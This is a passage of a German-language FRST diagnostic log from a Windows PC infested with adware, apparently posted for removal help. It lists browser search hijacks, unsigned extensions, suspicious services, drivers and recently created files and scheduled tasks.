FF DefaultSearchEngine.US: data:text/plain,browser.search.defaultenginename.US=yessearches
FF SelectedSearchEngine: yoursearching
FF Homepage: search.mpc.am
FF Keyword.URL: hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2012-05-14] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\progra~2\mcafee\msc\npmcsn~1.dll [2012-05-14] ()
FF user.js: detected! => C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\user.js [2016-02-06]
FF user.js: detected! => C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js [2016-02-06]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\istartpageing.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\smod.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\yoursearching.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\istartpageing.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\yoursearching.xml [2016-01-31]
FF Extension: FirefixTab - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: YahooToolsProtected - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\yahooprotected@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: FirefixTab - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: YahooToolsProtected - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\yahooprotected@gmail.com [2016-01-31] [ist nicht signiert]
FF HKLM\...\Firefox\Extensions: [{F64D5F15-81C2-4573-814A-31A0BF41A433}] - C:\Program Files\shopperz010220161759\Firefox\{F64D5F15-81C2-4573-814A-31A0BF41A433}.xpi => nicht gefunden
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com
FF HKLM-x32\...\Firefox\Extensions: [yahooprotected@gmail.com] - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\yahooprotected@gmail.com
FF HKLM-x32\...\Firefox\Extensions: [{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}] - C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}\{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}.xpi
FF Extension: Download Protect - C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}\{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}.xpi [2016-01-31]
FF HKLM-x32\...\Firefox\Extensions: [{F64D5F15-81C2-4573-814A-31A0BF41A433}] - C:\Program Files\shopperz010220161759\Firefox\{F64D5F15-81C2-4573-814A-31A0BF41A433}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{68168E9E-D81A-4095-8CAB-A6196896B695}] - C:\WINDOWS\Installer\{46242452-A8DC-46C4-94FC-6839E9398290}\{68168E9E-D81A-4095-8CAB-A6196896B695}.xpi
FF Extension: Download Protect - C:\WINDOWS\Installer\{46242452-A8DC-46C4-94FC-6839E9398290}\{68168E9E-D81A-4095-8CAB-A6196896B695}.xpi [2016-02-06]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-01-31] [ist nicht signiert]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\!FCD01E059CED5F6D5A56ED297FC9FBBCFCD0.js [2016-01-31] <==== ACHTUNG
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 [2016-01-31] <==== ACHTUNG
Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-02-06]
CHR HKU\S-1-5-21-2229505580-413648313-3343944023-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-02-06]
==================== Dienste (Nicht auf der Ausnahmeliste) ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 343FB16B-F8B8-4C5B-b5AE-FC1452693CBD; C:\Program Files\shopperz010220161759\Irytutia.exe [291160 2016-02-01] ()
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [207488 2012-07-31] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert]
S3 brsrv; C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\brsrv.exe [104448 2016-01-31] () [Datei ist nicht signiert]
R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
R2 ClaraUpdater; C:\Program Files (x86)\Common Files\ClaraUpdater\ClaraUpdater.exe [777944 2016-02-01] (ClaraLabs)
R2 CltMngSvc; C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe [3246864 2016-01-14] (Client Connect LTD)
S3 csrcc; C:\Program Files\shopperz010220161759\csrcc.exe [1497432 2016-02-01] ()
S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
R2 DnsBlockUpdateSvc; C:\WINDOWS\system32\DnsBlockUpdateSvc.exe [151072 2016-01-31] ()
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-18] (Intel Corporation)
R2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [2751760 2016-01-31] (Lavasoft Limited)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
S3 McAWFwk; c:\Program Files\mcafee\msc\McAWFwk.exe [332080 2012-01-26] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
R2 mcmscsvc; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
U2 McNASvc; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [383608 2012-05-22] (McAfee, Inc.)
R2 McOobeSv; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
S2 McShield; C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe [237920 2012-06-22] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [218320 2012-06-22] (McAfee, Inc.)
R2 mfevtp; C:\windows\system32\mfevtps.exe [177144 2012-06-22] (McAfee, Inc.)
R2 MPCProtectService; C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [349152 2016-02-06] (DotC United Inc)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe [200728 2012-05-11] (McAfee, Inc.)
R2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-08-22] (NTI Corporation)
R2 Orbiter; C:\Program Files (x86)\ORBTR\orbiter.dll [558544 2016-02-06] (Client Connect LTD)
R2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-09-11] (Dritek System INC.)
R2 rowugoqo; C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\snscEFCA.tmp [225792 2016-01-31] () [Datei ist nicht signiert]
R2 shopperz010220161759 Updater; C:\Program Files\shopperz010220161759\Lugke.exe [158552 2016-02-01] ()
S4 SSFK; C:\Program Files (x86)\SFK\SSFK.exe [182976 2016-01-31] () [Datei ist nicht signiert]
R2 WdMan; C:\ProgramData\2WdM2\WdMan.exe [794376 2016-01-31] (TU-Funs LIMITED)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [15440 2012-07-26] (Microsoft Corporation)
R2 wucotusy; C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\hnsv4533.tmp [416256 2016-01-31] () [Datei ist nicht signiert]
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-08-01] (Atheros) [Datei ist nicht signiert]
S2 zigipyro; C:\Users\Manz\AppData\Local\B5B53C54-1454354074-E111-8F5D-B888E3A0B275\qnse4D3A.tmp [158720 2015-12-26] () [Datei ist nicht signiert]
R2 zutuzuni; C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\jnsl20B1.tmp [307712 2016-01-31] () [Datei ist nicht signiert]
R2 nekydufizbt; C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\knsbFC2B.tmpfs [X]
S2 Ofelje; "C:\Users\Manz\AppData\Roaming\IodelBefqo\Uithzaa.exe" -cms [X]
===================== Treiber (Nicht auf der Ausnahmeliste) ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [5139968 2012-06-02] (Broadcom Corporation)
R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2016-02-01] ()
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-07-31] (Qualcomm Atheros)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [69672 2012-06-22] (McAfee, Inc.)
R1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [56728 2016-02-01] (Windows (R) Win 7 DDK provider)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3295984 2012-07-26] (Broadcom Corporation)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [196440 2012-04-21] (McAfee, Inc.)
S3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [169320 2012-06-22] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [300392 2012-06-22] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [66712 2012-06-18] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [513456 2012-06-22] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [752672 2012-06-22] (McAfee, Inc.)
S3 mferkdet; C:\Windows\System32\drivers\mferkdet.sys [106112 2012-06-22] (McAfee, Inc.)
S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [335784 2012-06-22] (McAfee, Inc.)
R1 MPCKpt; C:\Windows\System32\DRIVERS\MPCKpt.sys [60136 2016-02-06] (DotC United Inc)
R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-09-11] (Dritek System Inc.)
R3 sdfhgdf; C:\Windows\System32\DRIVERS\sdfhgdf.sys [23208 2016-02-06] (Corporation) [Datei ist nicht signiert]
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [34216 2012-07-26] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258288 2012-07-26] (Microsoft Corporation)
S3 IntcAzAudAddService; \SystemRoot\system32\drivers\RTKVHD64.sys [X]
S4 nvlddmkm; \SystemRoot\system32\DRIVERS\nvlddmkm.sys [X]
S4 nvpciflt; \SystemRoot\system32\DRIVERS\nvpciflt.sys [X]
R3 SPPD; \??\C:\WINDOWS\system32\drivers\SPPD.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2016-02-06 19:06 - 2016-02-06 19:06 - 00000000 ____D C:\Users\Manz\AppData\Roaming\GeniusCache
2016-02-06 18:51 - 2016-02-06 18:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-02-06 18:47 - 2016-02-06 18:48 - 00000000 ____D C:\FRST
2016-02-06 18:45 - 2016-02-06 18:45 - 00000000 ____D C:\Program Files\{BC760D76-4920-48C3-A3DD-6689681D1D92}
2016-02-06 18:45 - 2016-02-06 18:45 - 00000000 ____D C:\Program Files (x86)\{6E5909E8-3B98-4878-BF84-218A47B5BDBE}
2016-02-06 18:44 - 2016-02-06 18:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
2016-02-06 16:41 - 2016-02-06 18:44 - 00001693 _____ C:\Users\Public\Desktop\MPC Cleaner.lnk
2016-02-06 16:38 - 2016-02-06 16:38 - 00001022 _____ C:\Users\Public\Desktop\Max Driver Updater.lnk
2016-02-06 16:38 - 2016-02-06 16:38 - 00000000 ____D C:\Users\Manz\AppData\Roaming\csdimedia
2016-02-06 16:38 - 2016-02-06 16:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Max Driver Updater
2016-02-06 16:37 - 2016-02-06 16:38 - 00000000 ____D C:\Program Files (x86)\Max Driver Updater
2016-02-06 16:37 - 2016-02-06 16:38 - 00000000 ____D C:\Program Files (x86)\DNS Unlocker
2016-02-06 16:37 - 2016-02-06 16:37 - 00003492 _____ C:\WINDOWS\System32\Tasks\IBUpd
2016-02-06 16:37 - 2016-02-06 16:37 - 00003444 _____ C:\WINDOWS\System32\Tasks\bvxvbxxvaa
2016-02-06 16:37 - 2016-02-06 16:37 - 00002262 _____ C:\Users\Manz\Desktop\BrowserAir.lnk
2016-02-06 16:37 - 2016-02-06 16:37 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BrowserAir
2016-02-06 16:36 - 2016-02-06 18:47 - 00000000 ____D C:\Users\Manz\AppData\Local\gmsd_de_005010228
2016-02-06 16:36 - 2016-02-06 16:36 - 00000000 ____D C:\Users\Manz\AppData\Local\bvxvbxxvaa
2016-02-06 16:36 - 2016-02-06 16:36 - 00000000 ____D C:\Program Files (x86)\gmsd_de_005010228
2016-02-06 16:35 - 2016-02-06 16:37 - 00000000 ____D C:\Users\Manz\AppData\Local\SearchProtect
2016-02-06 16:35 - 2016-02-06 16:36 - 00000000 ____D C:\Program Files (x86)\SearchProtect
2016-02-06 16:35 - 2016-02-06 16:35 - 00000000 ____D C:\Program Files (x86)\ORBTR
2016-02-06 16:33 - 2016-02-06 16:33 - 00060136 _____ (DotC United Inc) C:\WINDOWS\system32\Drivers\MPCKpt.sys
2016-02-06 16:33 - 2016-02-06 16:33 - 00003228 _____ C:\WINDOWS\System32\Tasks\runTask
2016-02-06 16:33 - 2016-02-06 16:33 - 00003132 _____ C:\WINDOWS\System32\Tasks\updateTask
2016-02-06 16:32 - 2016-02-06 16:35 - 00000000 ____D C:\Program Files (x86)\SpaceSondPro_v53.12776
2016-02-06 16:32 - 2016-02-06 16:32 - 00000836 _____ C:\Users\Manz\Desktop\SpaceSoundPro.lnk
2016-02-06 16:32 - 2016-02-06 16:32 - 00000752 _____ C:\Users\Manz\Desktop\Sound+.lnk
2016-02-06 16:32 - 2016-02-06 16:32 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpaceSoundPro 1.0
2016-02-06 16:32 - 2016-02-06 16:32 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sound+ 1.0
2016-02-06 16:31 - 2016-02-06 16:38 - 00000000 ____D C:\Program Files\Sound+
2016-02-06 16:20 - 2016-02-06 16:20 - 00000000 ____D C:\Users\Manz\AppData\Local\rec_de_184
2016-02-06 16:20 - 2016-02-06 16:20 - 00000000 ____D C:\Program Files (x86)\rec_de_184
2016-02-06 16:20 - 2016-02-06 16:20 - 00000000 ____D C:\Program Files (x86)\Games-desktop
2016-02-01 19:50 - 2016-02-06 18:46 - 00002316 _____ C:\Users\Manz\Desktop\Facebook.lnk
2016-02-01 19:50 - 2016-02-06 18:46 - 00002314 _____ C:\Users\Manz\Desktop\Wikipedia.lnk
2016-02-01 19:50 - 2016-02-06 18:46 - 00002310 _____ C:\Users\Manz\Desktop\Youtube.lnk
2016-02-01 19:50 - 2016-02-06 18:46 - 00002310 _____ C:\Users\Manz\Desktop\Hotmail.lnk
2016-02-01 19:50 - 2016-02-06 18:46 - 00002302 _____ C:\Users\Manz\Desktop\Amazon.lnk
2016-02-01 19:43 - 2016-02-01 19:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-50609.txt
2016-02-01 19:43 - 2016-02-01 19:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-50562.txt
2016-02-01 19:43 - 2016-02-01 19:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-49546.txt
2016-02-01 19:42 - 2016-02-01 19:42 - 00000000 ____D C:\WINDOWS\system32\ege
2016-02-01 19:37 - 2016-02-06 16:37 - 00000099 _____ C:\Users\Manz\AppData\Roaming\WB.CFG
2016-02-01 19:33 - 2016-02-01 19:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GMX MailCheck
2016-02-01 19:33 - 2016-02-01 19:33 - 00000000 ____D C:\Program Files\GMX MailCheck
2016-02-01 19:33 - 2016-02-01 19:33 - 00000000 ____D C:\Program Files (x86)\GMX MailCheck
2016-02-01 19:23 - 2016-02-01 19:23 - 00001143 _____ C:\Users\Manz\Desktop\Continue Last version Installation.lnk
2016-02-01 19:14 - 2016-02-01 19:14 - 00000000 ____D C:\Users\Manz\AppData\Local\B5B53C54-1454354074-E111-8F5D-B888E3A0B275
2016-02-01 18:58 - 2016-02-01 18:58 - 00003172 _____ C:\WINDOWS\System32\Tasks\crash_service
2016-02-01 18:58 - 2016-02-01 18:58 - 00003140 _____ C:\WINDOWS\System32\Tasks\Run_Bobby_Browser
2016-02-01 18:58 - 2016-02-01 18:58 - 00002272 _____ C:\Users\Manz\Desktop\BoBrowser.lnk
2016-02-01 18:58 - 2016-02-01 18:58 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BoBrowser
2016-02-01 18:58 - 2016-02-01 18:58 - 00000000 ____D C:\Users\Manz\AppData\Local\Tempfolder
2016-02-01 18:57 - 2016-02-01 18:58 - 00000000 ____D C:\Users\Manz\AppData\Local\BoBrowser
2016-02-01 18:57 - 2016-02-01 18:57 - 00034712 _____ () C:\WINDOWS\system32\Drivers\bsdriver.sys
2016-02-01 18:57 - 2016-02-01 18:57 - 00003334 _____ C:\WINDOWS\System32\Tasks\Awiikjuw
2016-02-01 18:57 - 2016-02-01 18:57 - 00000000 ____D C:\Users\Manz\AppData\LocalLow\Company
2016-02-01 18:57 - 2016-02-01 18:57 - 00000000 ____D C:\Users\Manz\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-02-01 18:57 - 2016-02-01 18:57 - 00000000 ____D C:\uninst
2016-02-01 18:57 - 2016-02-01 18:57 - 00000000 ____D C:\Program Files\shopperz010220161759
2016-02-01 18:52 - 2016-02-01 18:52 - 00000827 _____ C:\Users\Manz\Desktop\3D BubbleSound.lnk
2016-02-01 18:52 - 2016-02-01 18:52 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BubbleSound 1.0
2016-02-01 18:52 - 2016-02-01 18:52 - 00000000 ____D C:\Program Files\BubbleSound
2016-02-01 18:43 - 2016-02-01 18:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-50265.txt
2016-02-01 17:02 - 2016-02-01 18:57 - 00056728 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\cherimoya.sys
2016-01-31 21:46 - 2016-01-31 21:46 - 00000117 _____ C:\WINDOWS\system32\netcfg-3146031.txt
2016-01-31 21:42 - 2016-01-31 21:42 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium
2016-01-31 21:42 - 2016-01-31 21:42 - 00000000 ____D C:\Users\Manz\AppData\Local\Chromium
2016-01-31 21:39 - 2016-01-31 21:39 - 00003514 _____ C:\WINDOWS\System32\Tasks\ProfessionalCleaningSoftware_Popup
2016-01-31 21:39 - 2016-01-31 21:39 - 00003250 _____ C:\WINDOWS\System32\Tasks\ProfessionalCleaningSoftware_Start
2016-01-31 21:39 - 2016-01-31 21:39 - 00000000 ____D C:\Users\Manz\AppData\Roaming\updates
2016-01-31 21:39 - 2016-01-31 21:39 - 00000000 ____D C:\Users\Manz\AppData\Roaming\AVG
2016-01-31 21:38 - 2016-01-31 21:38 - 00000000 ____D C:\Users\Manz\AppData\Local\Professional_Cleaning_Sof
2016-01-31 21:37 - 2016-02-06 16:38 - 00000298 _____ C:\WINDOWS\Tasks\Price Fountain.job
2016-01-31 21:37 - 2016-02-06 16:37 - 00000276 _____ C:\WINDOWS\Tasks\Go_Palikan.job
2016-01-31 21:37 - 2016-02-01 19:49 - 00000000 ____D C:\Users\Manz\AppData\Local\ObscenelyAd
2016-01-31 21:37 - 2016-01-31 21:39 - 00000000 ____D C:\Users\Manz\Documents\ProfessionalCleaningSoftware
2016-01-31 21:37 - 2016-01-31 21:37 - 00003428 _____ C:\WINDOWS\System32\Tasks\ManzObscenelyAdV2
2016-01-31 21:37 - 2016-01-31 21:37 - 00002636 _____ C:\WINDOWS\System32\Tasks\Price Fountain
2016-01-31 21:37 - 2016-01-31 21:37 - 00002614 _____ C:\WINDOWS\System32\Tasks\Go_Palikan
2016-01-31 21:37 - 2016-01-31 21:37 - 00000000 ____D C:\Users\Manz\AppData\Roaming\PriceFountain
2016-01-31 21:37 - 2016-01-31 21:37 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Professional Cleaning Software
2016-01-31 21:37 - 2016-01-31 21:37 - 00000000 ____D C:\Users\Manz\AppData\Local\{8396B5CA-A73E-D972-CAA6-FC9AEECE0002}
2016-01-31 21:37 - 2016-01-31 21:37 - 00000000 ____D C:\Program Files (x86)\Professional Cleaning Software
2016-01-31 21:37 - 2016-01-31 21:37 - 00000000 ____D C:\Program Files (x86)\Pro PC Cleaner
2016-01-31 21:29 - 2016-02-01 19:17 - 00000000 ____D C:\Program Files (x86)\AVG
2016-01-31 21:27 - 2016-01-31 21:27 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Opera Software
2016-01-31 21:27 - 2016-01-31 21:27 - 00000000 ____D C:\Users\Manz\AppData\Local\Opera Software
2016-01-31 21:23 - 2016-02-01 19:19 - 00000000 ____D C:\Program Files (x86)\Opera
2016-01-31 21:22 - 2016-01-31 21:23 - 00000000 ____D C:\Program Files (x86)\1und1Softwareaktualisierung
2016-01-31 21:22 - 2016-01-31 21:22 - 00003862 _____ C:\WINDOWS\System32\Tasks\Registration 1und1 Task
2016-01-31 21:22 - 2016-01-31 21:22 - 00003586 _____ C:\WINDOWS\System32\Tasks\Security Utility Updater
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\Users\Manz\AppData\LocalLow\1&1 Mail & Media GmbH
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\ProgramData\UUdb
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\ProgramData\1&1 Mail & Media GmbH
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\Program Files (x86)\securityutility
2016-01-31 21:20 - 2016-01-31 21:20 - 00550896 _____ C:\Users\Manz\Downloads\adobe-digital-editions-4.0-setup.exe
2016-01-31 21:12 - 2016-01-31 21:12 - 00001173 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2016-01-31 21:12 - 2016-01-31 21:12 - 00001161 _____ C:\Users\Public\Desktop\Mozilla Thunderbird.lnk
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Thunderbird
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Users\Manz\AppData\Local\Thunderbird
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-01-31 21:00 - 2016-01-31 21:00 - 00000117 _____ C:\WINDOWS\system32\netcfg-361281.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000323 _____ C:\WINDOWS\system32\netcfg-349968.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000117 _____ C:\WINDOWS\system32\netcfg-347609.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000117 _____ C:\WINDOWS\system32\netcfg-344468.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000117 _____ C:\WINDOWS\system32\netcfg-334234.txt
2016-01-31 20:57 - 2016-02-06 16:45 - 00000000 ____D C:\Users\Manz\AppData\Local\CrashDumps
2016-01-31 20:54 - 2016-01-31 20:54 - 00000117 _____ C:\WINDOWS\system32\netcfg-41625.txt
2016-01-31 20:53 - 2016-01-31 20:53 - 00000117 _____ C:\WINDOWS\system32\netcfg-1946671.txt
2016-01-31 20:53 - 2016-01-31 20:53 - 00000000 ____D C:\Users\Manz\AppData\Local\B5B53C54-1454273619-E111-8F5D-B888E3A0B275
2016-01-31 20:22 - 2016-01-31 20:22 - 00000117 _____ C:\WINDOWS\system32\netcfg-41890.txt
2016-01-31 20:20 - 2016-01-31 20:20 - 00000117 _____ C:\WINDOWS\system32\netcfg-809703.txt
2016-01-31 20:19 - 2012-08-10 09:40 - 02213776 _____ (ELAN Microelectronics Corp.) C:\WINDOWS\ETDUninst.dll
2016-01-31 19:53 - 2016-01-31 19:53 - 00000000 ____D C:\Program Files\{05EB6F99-463B-44CA-93A7-7C57786E2569}
2016-01-31 19:53 - 2016-01-31 19:53 - 00000000 ____D C:\Program Files (x86)\{81124F8F-D6AB-4912-9F8D-54DC4E6DDE56}
2016-01-31 19:01 - 2016-01-31 19:01 - 00000117 _____ C:\WINDOWS\system32\netcfg-13944156.txt
2016-01-31 19:01 - 2016-01-31 19:01 - 00000117 _____ C:\WINDOWS\system32\netcfg-13941265.txt
2016-01-31 18:50 - 2016-01-31 18:50 - 00000117 _____ C:\WINDOWS\system32\netcfg-13267328.txt
